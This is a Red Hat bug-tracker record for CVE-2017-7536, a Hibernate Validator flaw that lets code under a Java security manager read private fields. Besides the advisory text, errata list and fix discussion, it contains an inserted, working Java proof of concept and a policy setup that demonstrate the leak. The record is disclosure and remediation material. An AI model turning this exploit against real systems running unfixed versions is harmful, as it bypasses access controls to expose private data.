Bug 1465573 (CVE-2017-7536) - CVE-2017-7536 hibernate-validator: Privilege escalation when running under the security manager
Summary: CVE-2017-7536 hibernate-validator: Privilege escalation when running under th...
Status: CLOSED ERRATA
Alias: CVE-2017-7536
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=moderate,public=20170926,repor...
Keywords: Security
Depends On: 1470920 1472059 1576141 1576142
Blocks: 1465576 1493931 1520314
 
Reported: 2017-06-27 16:26 UTC by Andrej Nemec
Modified: 2019-06-11 11:13 UTC (History)
CC List: 98 users

It was found that when the security manager's reflective permission, which allows access to the private members of a class, is granted to Hibernate Validator, a potential privilege escalation can occur. Calling code that does not itself hold that permission can declare a constraint on a private member via XML, validate an invalid instance of the class, and read the private member's value via ConstraintViolation#getInvalidValue().
Clone Of:
Last Closed: 2019-06-08 03:15:40 UTC




External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2017:2808 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform security update 2017-09-26 22:39:54 UTC
Red Hat Product Errata RHSA-2017:2809 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform security update 2017-09-26 22:51:56 UTC
Red Hat Product Errata RHSA-2017:2810 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform security update 2017-09-26 21:58:02 UTC
Red Hat Product Errata RHSA-2017:2811 normal SHIPPED_LIVE Important: eap7-jboss-ec2-eap security update 2017-09-26 23:14:16 UTC
Red Hat Product Errata RHSA-2017:3141 normal SHIPPED_LIVE Important: rhvm-appliance security, bug fix, and enhancement update 2017-11-07 22:23:02 UTC
Red Hat Product Errata RHSA-2017:3454 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform 7.1.0 security update 2017-12-13 22:48:09 UTC
Red Hat Product Errata RHSA-2017:3455 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform 7.1.0 security update 2017-12-13 22:57:25 UTC
Red Hat Product Errata RHSA-2017:3456 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform 7.1.0 security update 2017-12-13 22:31:03 UTC
Red Hat Product Errata RHSA-2017:3458 normal SHIPPED_LIVE Important: eap7-jboss-ec2-eap security update 2017-12-13 23:26:13 UTC
Red Hat Product Errata RHSA-2018:2740 None None None 2018-09-24 21:46 UTC
Red Hat Product Errata RHSA-2018:2741 None None None 2018-09-24 22:04 UTC
Red Hat Product Errata RHSA-2018:2742 None None None 2018-09-24 22:08 UTC
Red Hat Product Errata RHSA-2018:2743 None None None 2018-09-24 22:10 UTC
Red Hat Product Errata RHSA-2018:2927 None None None 2018-10-16 15:20 UTC
Red Hat Product Errata RHSA-2018:3817 None None None 2018-12-11 14:12 UTC

Description Andrej Nemec 2017-06-27 16:26:07 UTC
A vulnerability which allows for a potential privilege escalation was found in the Hibernate Validator. If a security manager is present and HV itself is allowed to access private members reflectively as per the SM's configuration, that'll allow calling code without that permission to get hold of private state. The attack vector is to declare a constraint on a private member using XML, validate an invalid instance of that type and access the private member value via ConstraintViolation#getInvalidValue().
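
The attack vector described above, written out as an added example (it is not code from this bug report or from the Hibernate Validator project). It assumes Hibernate Validator 5.x and its EL dependency on the classpath, a constructed `Credentials` class with a private field and no getter, a constructed XML constraint mapping that puts `@Size(max = 0)` on that field so every non-empty value is invalid, and a constructed policy file `hv.policy` whose codeBase paths are placeholders. The permission name `org.hibernate.validator.HibernateValidatorPermission` / `accessPrivateMembers` mentioned in the comments is what the upstream fix introduced; it is taken from the upstream code, not from this bug record.

```java
// Added example (not from the bug report): reads a private field through
// ConstraintViolation#getInvalidValue() using only an XML constraint mapping.
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.Set;

import javax.validation.Configuration;
import javax.validation.ConstraintViolation;
import javax.validation.Validation;
import javax.validation.Validator;

// Constructed target class: private state, deliberately no accessor.
// Lives in the default package so the XML mapping can name it as "Credentials".
class Credentials {
    private final String secret;

    Credentials(String secret) {
        this.secret = secret;
    }
}

public class PrivateStateLeak {

    // Constructed Bean Validation 1.1 mapping. The caller never edits
    // Credentials and never calls setAccessible() itself; it only asks the
    // validator to put a constraint on the private field.
    static final String MAPPING =
          "<constraint-mappings xmlns=\"http://jboss.org/xml/ns/javax/validation/mapping\"\n"
        + "                     version=\"1.1\">\n"
        + "  <bean class=\"Credentials\" ignore-annotations=\"true\">\n"
        + "    <field name=\"secret\">\n"
        + "      <constraint annotation=\"javax.validation.constraints.Size\">\n"
        + "        <element name=\"max\">0</element>\n"
        + "      </constraint>\n"
        + "    </field>\n"
        + "  </bean>\n"
        + "</constraint-mappings>\n";

    // Validates an instance that is guaranteed to violate the Size constraint
    // and returns whatever the violation exposes as the "invalid value".
    static Object leakSecret(String secret) {
        Configuration<?> config = Validation.byDefaultProvider().configure();
        config.addMapping(new ByteArrayInputStream(MAPPING.getBytes(StandardCharsets.UTF_8)));
        Validator validator = config.buildValidatorFactory().getValidator();

        Set<ConstraintViolation<Credentials>> violations =
                validator.validate(new Credentials(secret));

        // Exactly one violation is expected: the Size(max=0) constraint on "secret".
        for (ConstraintViolation<Credentials> v : violations) {
            if ("secret".equals(v.getPropertyPath().toString())) {
                return v.getInvalidValue();   // the private field's value
            }
        }
        return null;
    }

    public static void main(String[] args) {
        // Run with a security manager so the permission split matters:
        //   java -Djava.security.manager -Djava.security.policy=hv.policy PrivateStateLeak
        //
        // hv.policy (constructed; adjust codeBase URLs; bootstrap permissions such
        // as reading service files are omitted for brevity):
        //   grant codeBase "file:/opt/app/lib/hibernate-validator.jar" {
        //       permission java.lang.reflect.ReflectPermission "suppressAccessChecks";
        //   };
        //   grant codeBase "file:/opt/app/classes/" {
        //       // calling code: deliberately NO ReflectPermission here
        //   };
        //
        // Unfixed 5.x: HV performs setAccessible() inside its own privileged block,
        // so this prints "hunter2" even though the caller holds no ReflectPermission.
        // Fixed 5.x branches (per upstream, not this page): validate() throws an
        // AccessControlException unless the caller is additionally granted
        //   permission org.hibernate.validator.HibernateValidatorPermission "accessPrivateMembers";
        System.out.println("leaked: " + leakSecret("hunter2"));
    }
}
```

The useful check for an operator is the second policy grant: if application code that is not trusted with `ReflectPermission("suppressAccessChecks")` can still cause a validator to reach private fields, the security manager boundary is not doing what the policy says, and only a fixed Hibernate Validator (which demands a permission from the caller rather than from itself) restores it.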

Comment 1 Andrej Nemec 2017-06-27 16:26:41 UTC
Acknowledgments:

Name: Gunnar Morling (Red Hat)

Comment 2 Gunnar Morling 2017-07-06 13:10:27 UTC
Hi, we'd like to know how to proceed in this matter. Specifically we are about to release Hibernate Validator 6 (the reference implementation of Bean Validation 2.0) soon. Can we provide a fix for that issue in this new major version at this point in time? Our plan is to check for a specific permission which the caller must possess in order to validate constraints on private members when a security manager is enabled. We'd like to be sure though whether we can provide this solution while this bug record for Hibernate Validator 5.x still is open. Thanks!

Comment 11 Jason Shepherd 2017-09-07 03:30:33 UTC
Red Hat Mobile Platform Millicore component does run with a security manager enabled, marking it as not affected.

Comment 12 errata-xmlrpc 2017-09-26 17:59:53 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0.8

Via RHSA-2017:2810 https://access.redhat.com/errata/RHSA-2017:2810

Comment 13 errata-xmlrpc 2017-09-26 18:42:36 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7

Via RHSA-2017:2808 https://access.redhat.com/errata/RHSA-2017:2808

Comment 14 errata-xmlrpc 2017-09-26 18:54:53 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6

Via RHSA-2017:2809 https://access.redhat.com/errata/RHSA-2017:2809

Comment 15 errata-xmlrpc 2017-09-26 19:16:13 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7
  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6

Via RHSA-2017:2811 https://access.redhat.com/errata/RHSA-2017:2811

Comment 16 errata-xmlrpc 2017-11-07 17:32:52 UTC
This issue has been addressed in the following products:

  RHEV 4.X RHEV-H and Agents for RHEL-7

Via RHSA-2017:3141 https://access.redhat.com/errata/RHSA-2017:3141

Comment 17 errata-xmlrpc 2017-12-13 17:36:13 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform

Via RHSA-2017:3456 https://access.redhat.com/errata/RHSA-2017:3456

Comment 18 errata-xmlrpc 2017-12-13 18:28:08 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.1 for RHEL 6

Via RHSA-2017:3454 https://access.redhat.com/errata/RHSA-2017:3454

Comment 19 errata-xmlrpc 2017-12-13 18:44:25 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.1 for RHEL 7

Via RHSA-2017:3455 https://access.redhat.com/errata/RHSA-2017:3455

Comment 20 errata-xmlrpc 2017-12-13 18:54:51 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.1 for RHEL 7
  Red Hat JBoss Enterprise Application Platform 7.1 for RHEL 6

Via RHSA-2017:3458 https://access.redhat.com/errata/RHSA-2017:3458

Comment 21 Salvatore Bonaccorso 2017-12-28 08:57:57 UTC
Hi

Would it be possible to indicate where the issue was fixed? In Debian we ship libhibernate-validator-java and we would like to clarify if/how we are affected by the issue. Is there any further reference?

Thank you already!

Regards,
Salvatore

Comment 23 Fabio Olive Leite 2017-12-28 17:19:16 UTC
Setting needinfo to Bharti Kundal so that she sees it.

Comment 24 Bharti Kundal 2018-01-02 07:57:01 UTC
(In reply to Salvatore Bonaccorso from comment #21)
> Hi
> 
> Would it be possible to indicate where the issue was fixed? In Debian we
> ship libhibernate-validator-java and we would like to clarify if/how we are
> affected by the issue. Is there any further reference?
> 
> Thank you already!
> 
> Regards,
> Salvatore

Hi Salvatore,

The issue affected all the HV 5.x branches (so 5.2, 5.3, 5.4 are all affected). 6 is not.

It's fixed in the upstream 5.2 branch. The branch is here: https://github.com/hibernate/hibernate-validator/tree/5.2

Does this help?

Thanks and Regards,
Bharti

Comment 25 Salvatore Bonaccorso 2018-01-02 08:18:17 UTC
Hi Bharti!

(In reply to Bharti Kundal from comment #24)
> (In reply to Salvatore Bonaccorso from comment #21)
> > Hi
> > 
> > Would it be possible to indicate where the issue was fixed? In Debian we
> > ship libhibernate-validator-java and we would like to clarify if/how we are
> > affected by the issue. Is there any further reference?
> > 
> > Thank you already!
> > 
> > Regards,
> > Salvatore
> 
> Hi Salvatore,
> 
> The issue affected all the HV 5.x branches (so 5.2, 5.3, 5.4 are all
> affected). 6 is not.
> 
> It's fixed in the upstream 5.2 branch. The branch is here:
> https://github.com/hibernate/hibernate-validator/tree/5.2
> 
> Does this help?

Yes, thanks, that helps!

Regards,
Salvatore

Comment 31 errata-xmlrpc 2018-09-24 21:46:28 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform

Via RHSA-2018:2740 https://access.redhat.com/errata/RHSA-2018:2740

Comment 32 errata-xmlrpc 2018-09-24 22:04:21 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7

Via RHSA-2018:2741 https://access.redhat.com/errata/RHSA-2018:2741

Comment 33 errata-xmlrpc 2018-09-24 22:08:15 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 5

Via RHSA-2018:2742 https://access.redhat.com/errata/RHSA-2018:2742

Comment 34 errata-xmlrpc 2018-09-24 22:09:32 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6

Via RHSA-2018:2743 https://access.redhat.com/errata/RHSA-2018:2743

Comment 35 errata-xmlrpc 2018-10-16 15:19:30 UTC
This issue has been addressed in the following products:

  Red Hat Satellite 6.4 for RHEL 7

Via RHSA-2018:2927 https://access.redhat.com/errata/RHSA-2018:2927

Comment 36 errata-xmlrpc 2018-12-11 14:12:25 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Fuse

Via RHSA-2018:3817 https://access.redhat.com/errata/RHSA-2018:3817

Comment 37 Joshua Padman 2019-05-15 22:45:23 UTC
This vulnerability is out of security support scope for the following products:
 * Red Hat Enterprise Application Platform 5
 * Red Hat JBoss Operations Network 3

Please refer to https://access.redhat.com/support/policy/updates/jboss_notes for more details.

